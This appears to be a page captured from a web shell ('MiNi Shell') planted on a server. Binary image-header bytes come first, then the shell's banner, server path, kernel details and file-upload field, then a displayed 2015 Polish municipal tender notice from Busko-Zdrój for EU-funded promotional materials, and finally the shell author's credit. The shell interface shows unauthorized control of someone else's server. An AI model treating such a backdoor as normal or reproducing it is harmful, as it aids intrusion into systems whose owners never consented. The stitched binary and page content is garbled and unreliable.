JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150123/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150123/9787-N-2015.html

<p class="kh_header"><b>Busko-Zdrój: Zaprojektowanie, wykonanie i dostarczenie materiałów promocyjnych dla zadania pn. *Wzrost estetyki i poprawa funkcjonalności przestrzeni publicznej miasta Busko-Zdrój - etap II* realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013</b><br>
<b>Numer ogłoszenia: 9787 - 2015; data zamieszczenia: 23.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta i Gminy , ul. Adama Mickiewicza 10, 28-100 Busko-Zdrój, woj. świętokrzyskie, tel. 041 3705200, faks 041 3705290.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umig.busko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie, wykonanie i dostarczenie materiałów promocyjnych dla zadania pn. *Wzrost estetyki i poprawa funkcjonalności przestrzeni publicznej miasta Busko-Zdrój - etap II* realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest:
Usługa polegająca na zaprojektowaniu, wykonaniu i dostarczeniu materiałów promocyjnych dla zadania pn. *Wzrost estetyki i poprawa funkcjonalności przestrzeni publicznej miasta Busko-Zdrój - etap II* realizowanego w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013, 
a w tym:  
1) długopis metalowy:
- automatyczny o metalizowanej chromowanej powierzchni, 
- kolor obudowy: miks kolorystyczny (czerwony, błękitny, zielony),
- z niebieskim wkładem wymiennym, 
- opakowanie: po 100sztuk , całość w opakowaniu tekturowym zbiorczym
- oznakowany dwustronnie techniką graweru laserowego (na powierzchni długopisu): 
a) logo Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Rozwoju Regionalnego
b) logo Program Regionalny
c) herb Województwa Świętokrzyskiego z podpisem *Województwo Świętokrzyskie*,
d) herb Gminy Busko-Zdrój z podpisem *Gmina Busko-Zdrój*,
e) hasło RPOWŚ *...dla rozwoju Województwa Świętokrzyskiego...*
f) napis: Projekt pn. *Wzrost estetyki i poprawa funkcjonalności przestrzeni publicznej miasta Busko-Zdrój - etap II* 
2) ołówek automatyczny metalowy:
- automatyczny o metalizowanej chromowanej powierzchni, 
- kolor obudowy: miks kolorystyczny (czerwony, błękitny, zielony),
- opakowanie: po 100sztuk , całość w opakowaniu tekturowym zbiorczym
- oznakowany dwustronnie techniką graweru laserowego (na powierzchni ołówka): 
a) logo Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Rozwoju Regionalnego
b) logo Program Regionalny
c) herb Województwa Świętokrzyskiego z podpisem *Województwo Świętokrzyskie*,
d) herb Gminy Busko-Zdrój z podpisem *Gmina Busko-Zdrój*,
e) hasło RPOWŚ *...dla rozwoju Województwa Świętokrzyskiego...*
f) napis: Projekt pn. *Wzrost estetyki i poprawa funkcjonalności przestrzeni publicznej miasta Busko-Zdrój - etap II* 
3) notes książkowy: 
- Wymiary około 17cm(szerokość) (?5cm) x24cm(wysokość) (?5cm) 
- Objętość: min 160 stron(?10cm)
- Papier wewnątrz: chamois 80g/m2, wyklejki papier 140g/m2
- Papier wewnątrz: w linie
- Część promocyjna na wyklejance z przodu: 
a) należy umieścić zdjęcia kolorowe z obiektów dot. projektu - zdjęcia należy wykonać we własnym zakresie i propozycje wcześniej uzgodnić z Zamawiającym
b) należy również umieścić: 
- logo Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Rozwoju Regionalnego
- logo Program Regionalny
- herb Województwa Świętokrzyskiego z podpisem *Województwo Świętokrzyskie*,
- herb Gminy Busko-Zdrój z podpisem *Gmina Busko-Zdrój*,
- hasło RPOWŚ *...dla rozwoju Województwa Świętokrzyskiego...*
- napis: Projekt pn. *Wzrost estetyki i poprawa funkcjonalności przestrzeni publicznej miasta Busko-Zdrój - etap II* 
- Wykończenie: Blok notesu szyty oraz dodatkowo klejony, tasiemka z logo Unii Europejskiej, herb Województwa Świętokrzyskiego, hasło RPOWŚ i nazwa projektu (według wytycznych jak powyżej), oprawa skóropodobna,
4) breloczki z otwieraczami:
- metalowy, 
- minimalne wymiary 8,3x2,8 cm
- pakowany w pojedynczy kartonik, 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
5) teczki konferencyjne A4 zapinane:
- teczka konferencyja wykonana z miękkiej skóry PU (przypominająca prawdziwą skórę). Zawierająca notes formatu A4 -30 stron, uchwyt na długopis trzy przegródki
- powierzchnia nadruku 7x2,5 cm. 
- minimalne wymiary 24,5 x 33 x1,3 cm 
- należy przedstawić 4  propozycje do zaakceptowania przez Zamawiającego,
6) teczki z gumką:
- Wykonana z grubej tektury, powlekana  folią polipropylenową z czarną wyklejką w środku.
Wyposażona w gumkę wzdłuż długiego boku, Posiada trzy wewnętrzne klapki zabezpieczające dokumenty, przed wypadnięciem.;
- minimalne wymiary: 230mm x 310mm x 20mm.
- różne kolory 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
7) torby konferencyjne:
- torba wykonana jest z poliestru, torba z regulowanym paskiem na ramię i rączki, zapinana na suwak błyskawiczny 
- minimalne wymiary: 42.7 x 30 x 10cm.
- powierzchnia nadruku 7x2,5 cm.
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
8) torby na ramię:
- poliestrowa torba na ramię z regulowanym paskiem na ramię i rączką. Torba posiadać ma kieszeń główną zasuwaną na zamek błyskawiczny oraz mniejszą kieszeń z przodu torby również na zamek błyskawiczny, przegródki na długopisy,
- pakowane w pojedyncze torebki,
- minimalne wymiary 19x6,5x22 cm 
- powierzchnia nadruku 10x3 cm. 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
9) torby na zakupy:
- przestronna i wytrzymala  poliestrowa  torba na zakupy z dwoma komorami 
- minimalne wymiary : 43,0 x 40,0 x 20,0 cm.
- powierzchnia nadruku 10x3 cm
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
10) torby termiczne:
- dwupoziomowa torba-lodówka, 
- dolna komora powinna posiadać tyle miejsca, aby pomieścić 6 puszek 0,33l;
- minimalne wymiary 25cm x 22cm x 17cm;
- wyposażona w dwa uchwyty i regulowany pasek do przewieszenia przez ramię,
- logotyp umieszczony na torbie, o wymiarach 10 x 3 cm
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
11) torby sportowe:
- torba sportowa podróżna - kieszeń główna na zamek błyskawiczny, regulowany
- pasek na ramię z miękką poduszeczką na ramię. Torba powinna posiadać dodatkowe rączki/uchwyty. Torba powinna być wykonana z poliestru, nieprzemakalna i powinna posiadać boczne 2 kieszonki
- minimalne wymiary 50x20x31xcm 
- Powierzchnia nadruku 10 x3 zm. 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
12) notatniki A4:
- 60- kartkowy, 
- gramatura papieru: 90g/m2,
- kolor papieru: biały,
- minimalne wymiary 21,5x 28,8x0,6 cm 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
13) wizytownik stojący:
- metalowy, obrotowy,
- pakowany w pojedynczy kartonik, 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
14) pamięć USB w etui:
- materiał: metal, 
- pojemność: 32GB.
- prędkość odczytu zapisu: minimum 20MB
- pakowane w pojedyncze kartoniki, 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
15) koszulki bawełniane:
- gramatura - 205 g/m2 (White: 190g/m2) 
- MATERIAŁ : 100% bawełny
- 60% damskie (rozmiary: S, M, L,XL ) kolory: czarny, czerwony, niebieski, biały, szary
- 40% męskie (rozmiary: M, L, XL, XXL ) kolory: czarny, szary, granatowy, biały,
- projekt koszulki  należy wcześniej uzgodnić z Zamawiającym 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
16) parasolki:
- kolory: biały, kremowy, cappuccino, błękit, ciemna zieleń (butelkowa), jasna zieleń, czerwony, jednobarwne, 
- składane parasolki tzw. torebkowe -automat ,
- wymiary minimalne po rozłożeniu: O 90cm;
- wymiary maksymalne po złożeniu: 27cm (długość); 
- materiał: wodoodporny, wysokiej jakości nylon, uchwyt metalowy , stelaż z włóknem szklanym,
- waga minimalna: 300g
- projekt nadruków należy wcześniej uzgodnić z Zamawiającym 
- powierzchnia nadruku: 10x3 cm
- pakowany pojedynczo w pokrowiec ochronny z materiału z którego wykonany jest parasol
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
17) kurtki przeciwdeszczowe:
- 60% damskie (rozmiary: S, M, L,XL ) kolory: czarny, czerwony, granatowy,
- 40% męskie (rozmiary: M, L, XL, XXL ) kolory: czarny, szary, granatowy
- materiał: wodoodporny (min 3000 mm), 100% poliester,
- gramatura: 110g/m2
- wysokie parametry oddychalności
- niska waga
- zapinana na całej długości na zamek błyskawiczny
- podszewka z przewiewnej siateczki
- wytrzymałe zamki zabezpieczone przed wodą i wiatrem - przykryte listwami materiału.
- kaptur z tylną regulacją
- wysoki kołnierz dla dodatkowej ochrony przed zimnym wiatrem
- elastyczna gumka w mankietach
- boczne kieszenie
- kurtka powinna być zapakowana  w estetyczną  torebkę.
- projekt kurtki należy wcześniej uzgodnić z Zamawiającym 
- powierzchnia nadruku 10x3 cm
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
18) nożyczki:
- nożyczki biurowe gumowany uchwyt - ostrza  ze stali nierzewnej o ergonomicznym kształcie,
- minimalne wymiary: 18 cm,
- pakowane  pojedynczo, 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
19) kubki:
- porcelanowy o grubości ścianki maksymalnie 1,0mm;
- o pojemności około 0,3l,  
- pakowane w pojedyncze kartoniki, 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
20) kubki termiczne:
- pojemność min: 0,4l,
- z podgrzewaczem,
- z możliwością podłączenia do zapalniczki w aucie, 
- logotyp w postaci graweru laserowego,
- pakowany w pojedynczy kartonik, 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
21) taśmy miernicze stalowe:
- 8-metrowa miarka,
- funkcja stop,
- mechanizm zwijania
- rozmiary minimalne: 8cm x cm8 x 3,5cm,
- materiał taśmy: metal,
- pakowane w pojedyncze kartoniki, 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
22) drogomierz:
- materiał:  aluminium;
- obwód koła około 1 m;
- minimalna podziałka: 1 cm;
- maksymalny rejestrowany pomiar: 9999,99 m;
- w komplecie: pokrowiec, baterie,
- wyniki pomiaru wyświetlane w postaci cyfrowej na podświetlanym ekranie;
- funkcja Hold do łatwego odczytywania wartości pomiaru drogomierzem;
- pamięć na pięć zmierzonych wartości;
- odejmowanie wyniku przy ruchu wstecz i dodawanie w przód;
- solidne koło pomiarowe z okładziną antypoślizgową i pięcioma szprychami
- wygodny uchwyt do prowadzenia pomiarów z funkcją składania do łatwego przechowywania i transportowania
- hamulec do blokowania koła i odczytu
- boczna podpórka do odstawiania nieużywanego koła pomiarowego;
- miękki pokrowiec transportowy  
23) dalekomierz elektroniczny:
- zintegrowana kamera z 4-krotnym powiększeniem umożliwiającym pomiary nawet w słoneczne dni,
- odporność na pył i polewanie strumieniem wody, zgodnie z normą IP65,
- 200 metrowy zasięg dzięki technologiiPower Range Technology oraz trybowi LongRange;
- czujnik pochylenia 360o do pomiarów nachyleń i wysokości;
- funkcja redukcji Smart Horizontal Mode;
- wysokościowe pomiary śledzące do pomiarów wysokości drzew, kabli itp.;
- bluetooth Smart do transmisji danych wprost do iPhona lub iPada;
- wyrazisty i czytelny ekran;
- mnogość funkcji pomiarowych i obliczeniowych prostych w obsłudze;
- wbudowany kalkulator;
- podświetlany 3-liniowy ekran;
- automatyczna i wielofunkcyjna stopka;
- wyposażenie: pokrowiec, pasek na rękę, baterie, instrukcja obsługi, skrócona instrukcja obsługi, karta gwarancyjna, certyfikat;
24) skarbonki:
- rozmiary minimalne: 10cm x 10cm x 10cm,
- materiał: plastik, 
- pakowany w pojedynczy kartonik, 
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
25) kredki:
- drewniane, ołówkowe, 12 kolorów, o przekroju zaokrąglonego trójkąta o średnicy wkładu 3 mm
- posiadające mocne i niełamliwe grafity, odporne na wodę i blaknięcie,
- należy przedstawić 4 propozycje do zaakceptowania przez Zamawiającego,
26) reklamówki:
- minimalne wymiary 30cm x 45cm x7,0 cm;
- materiał: folia LDPE, (polietylenowa torba reklamowa bez zakładki górnej z wyciętym uchwytem i podklejką DKT oraz zakładką spodnią).
- powierzchnia nadruku 20x7 cm
Na wszystkich powyższych artykułach należy umieścić: 
- logo Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Rozwoju Regionalnego
- logo Program Regionalny
- herb Województwa Świętokrzyskiego z podpisem *Województwo Świętokrzyskie*,
- herb Gminy Busko-Zdrój z podpisem *Gmina Busko-Zdrój*,
- hasło RPOWŚ *...dla rozwoju Województwa Świętokrzyskiego...*
- napis: Projekt pn. *Wzrost estetyki i poprawa funkcjonalności przestrzeni publicznej miasta Busko-Zdrój - etap II* 
Materiały należy opracować zgodnie z wytycznymi Programu umieszczonymi na stronie internetowej  http://www.rpo-swietokrzyskie.pl  *Obowiązki Beneficjentów w zakresie działań informacyjnych i promocyjnych*
Wyceny należy dokonać w oparciu o załącznik nr 7 - uwzględniający ilość poszczególnych materiałów. 
W cenie zamówienia należy uwzględnić koszty dostarczenia zapakowanych materiałów do siedziby Zamawiającego.
2. Szczegółowy zakres prac określają:
1) WZÓR UMOWY - załącznik nr 6 do SIWZ;
2) Zestawienie ilości materiałów promocyjnych - załącznik nr 7 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.34.22.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 50.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości 1 500,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 głównych usług polegających na zaprojektowaniu i wykonaniu materiałów promocyjnych 
wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy z wykorzystaniem wzoru wg Załącznika 1</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Doświadczenie - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące okoliczności i warunki zmiany postanowień zawartej umowy.
1. Zmiana postanowień umowy wymaga formy pisemnej pod rygorem nieważności.
2. Zmiana postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, może nastąpić w przypadku: 
a) wystąpienia ograniczenia zakresu przedmiotu umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, na skutek okoliczności,  których nie można było przewidzieć na etapie przygotowania usługi do realizacji,
b) wystąpienia nieistotnych zmian tj. zmian, które nie mają wpływu na tzw. konieczne warunki Umowy  (termin, zakres, wartość Umowy).
3. Zmiana terminu wykonania przedmiotu umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, może nastąpić w przypadkach gdy: 
a) opóźnienie terminu wykonania przedmiotu Umowy nie jest zależne od Wykonawcy  
Termin ten zostaje wówczas  przedłużony o czas otrzymania w/w dokumentów;
4. Zmiana zakresu rzeczowego umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, może nastąpić w przypadku wystąpienia okoliczności, których nie można było przewidzieć na etapie przygotowania usługi do realizacji.
5. Zmiana wartości przedmiotu umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, może nastąpić w przypadkach
a) zmniejszenia zakresu rzeczowego Umowy,
b) urzędowych zmian w obowiązujących przepisach podatkowych, w tym zmiany podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umig.busko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Busku - Zdroju, ul. Mickiewicza 10, 28-100 Busko - Zdrój, pok. nr 37.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.02.2015 godzina 11:00, miejsce: Urząd Miasta i Gminy w Busku - Zdroju, ul. Mickiewicza 10, 28-100 Busko - Zdrój, pok. nr 3 (Biuro Obsługi Interesanta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Regionalny Program Operacyjny Województwa Świętokrzyskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com